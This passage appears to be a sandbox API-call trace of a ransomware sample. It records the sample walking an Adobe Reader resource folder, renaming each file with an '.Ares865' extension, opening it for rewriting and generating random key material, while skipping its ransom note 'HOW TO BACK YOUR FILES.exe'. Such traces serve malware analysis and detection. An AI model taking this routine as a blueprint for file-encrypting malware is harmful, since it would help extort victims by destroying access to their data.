dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.979] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=184786) returned 1 [0155.979] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0155.980] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.980] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.007] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.008] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.009] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.012] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="brt32.clx" | out: lpString1="brt32.clx") returned="brt32.clx" [0156.012] lstrlenW (lpString="brt32.clx") returned 9 [0156.012] lstrlenW (lpString="Ares865") returned 7 [0156.012] lstrcmpiW (lpString1="t32.clx", lpString2="Ares865") returned 1 [0156.013] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt32.clx.Ares865") returned 105 [0156.013] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt32.clx.ares865"), dwFlags=0x1) returned 1 [0156.017] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.017] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32768) returned 1 [0156.018] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.019] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.019] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.031] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.031] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.031] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.032] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="brt55.ths" | out: lpString1="brt55.ths") returned="brt55.ths" [0156.032] lstrlenW (lpString="brt55.ths") returned 9 [0156.032] lstrlenW (lpString="Ares865") returned 7 [0156.032] lstrcmpiW (lpString1="t55.ths", lpString2="Ares865") returned 1 [0156.033] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt55.ths.Ares865") returned 105 [0156.033] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt55.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt55.ths"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt55.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt55.ths.ares865"), dwFlags=0x1) returned 1 [0156.035] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt55.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt55.ths.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.035] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=534528) returned 1 [0156.035] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.036] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.036] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.066] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.067] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.067] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.074] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="brz.fca" | out: lpString1="brz.fca") returned="brz.fca" [0156.074] lstrlenW (lpString="brz.fca") returned 7 [0156.074] lstrlenW (lpString="Ares865") returned 7 [0156.075] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz.fca.Ares865") returned 103 [0156.075] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz.fca.ares865"), dwFlags=0x1) returned 1 [0156.078] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.078] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1596) returned 1 [0156.079] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.079] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.079] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.084] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.084] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.084] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.085] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="brz.hyp" | out: lpString1="brz.hyp") returned="brz.hyp" [0156.085] lstrlenW (lpString="brz.hyp") returned 7 [0156.085] lstrlenW (lpString="Ares865") returned 7 [0156.086] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz.hyp.Ares865") returned 103 [0156.086] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz.hyp.ares865"), dwFlags=0x1) returned 1 [0156.088] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.088] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2048) returned 1 [0156.088] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.089] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.089] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.092] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.093] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.093] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.093] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="brz32.clx" | out: lpString1="brz32.clx") returned="brz32.clx" [0156.093] lstrlenW (lpString="brz32.clx") returned 9 [0156.093] lstrlenW (lpString="Ares865") returned 7 [0156.093] lstrcmpiW (lpString1="z32.clx", lpString2="Ares865") returned 1 [0156.094] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz32.clx.Ares865") returned 105 [0156.094] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz32.clx.ares865"), dwFlags=0x1) returned 1 [0156.096] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.096] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32713) returned 1 [0156.096] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.097] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.097] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.102] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.102] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.103] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.103] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="brz40.hsp" | out: lpString1="brz40.hsp") returned="brz40.hsp" [0156.104] lstrlenW (lpString="brz40.hsp") returned 9 [0156.104] lstrlenW (lpString="Ares865") returned 7 [0156.104] lstrcmpiW (lpString1="z40.hsp", lpString2="Ares865") returned 1 [0156.104] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz40.hsp.Ares865") returned 105 [0156.104] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz40.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz40.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz40.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz40.hsp.ares865"), dwFlags=0x1) returned 1 [0156.106] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz40.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz40.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.106] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=97782) returned 1 [0156.106] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.107] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.107] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.116] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.117] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.117] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.119] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="bul.hyp" | out: lpString1="bul.hyp") returned="bul.hyp" [0156.119] lstrlenW (lpString="bul.hyp") returned 7 [0156.119] lstrlenW (lpString="Ares865") returned 7 [0156.119] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul.hyp.Ares865") returned 103 [0156.120] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bul.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bul.hyp.ares865"), dwFlags=0x1) returned 1 [0156.122] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bul.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.122] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=94208) returned 1 [0156.122] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.123] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.123] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.131] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.131] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.131] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.133] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="bul120.lex" | out: lpString1="bul120.lex") returned="bul120.lex" [0156.133] lstrlenW (lpString="bul120.lex") returned 10 [0156.133] lstrlenW (lpString="Ares865") returned 7 [0156.133] lstrcmpiW (lpString1="120.lex", lpString2="Ares865") returned -1 [0156.134] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul120.lex.Ares865") returned 106 [0156.134] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul120.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bul120.lex"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul120.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bul120.lex.ares865"), dwFlags=0x1) returned 1 [0156.136] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul120.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bul120.lex.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.136] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=466944) returned 1 [0156.136] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.137] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.137] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.161] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.162] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.162] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.168] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="bul32.clx" | out: lpString1="bul32.clx") returned="bul32.clx" [0156.168] lstrlenW (lpString="bul32.clx") returned 9 [0156.168] lstrlenW (lpString="Ares865") returned 7 [0156.169] lstrcmpiW (lpString1="l32.clx", lpString2="Ares865") returned 1 [0156.169] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul32.clx.Ares865") returned 105 [0156.169] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bul32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bul32.clx.ares865"), dwFlags=0x1) returned 1 [0156.172] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\bul32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\bul32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.172] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32766) returned 1 [0156.172] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.173] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.173] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.178] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.179] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.179] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.180] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="bulphon.env.Ares865" | out: lpString1="bulphon.env.Ares865") returned="bulphon.env.Ares865" [0156.180] lstrlenW (lpString="bulphon.env.Ares865") returned 19 [0156.180] lstrlenW (lpString="Ares865") returned 7 [0156.180] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0156.180] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7df78120, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="can.fca", cAlternateFileName="")) returned 1 [0156.180] lstrcmpiW (lpString1="can.fca", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0156.180] lstrcmpiW (lpString1="can.fca", lpString2="aoldtz.exe") returned 1 [0156.180] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="can.fca" | out: lpString1="can.fca") returned="can.fca" [0156.180] lstrlenW (lpString="can.fca") returned 7 [0156.180] lstrlenW (lpString="Ares865") returned 7 [0156.181] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can.fca.Ares865") returned 103 [0156.181] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can.fca.ares865"), dwFlags=0x1) returned 1 [0156.183] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.183] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4672) returned 1 [0156.184] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.184] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.184] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.187] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.188] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.188] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.189] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="can.hyp" | out: lpString1="can.hyp") returned="can.hyp" [0156.189] lstrlenW (lpString="can.hyp") returned 7 [0156.189] lstrlenW (lpString="Ares865") returned 7 [0156.189] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can.hyp.Ares865") returned 103 [0156.189] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can.hyp.ares865"), dwFlags=0x1) returned 1 [0156.191] CreateFileW 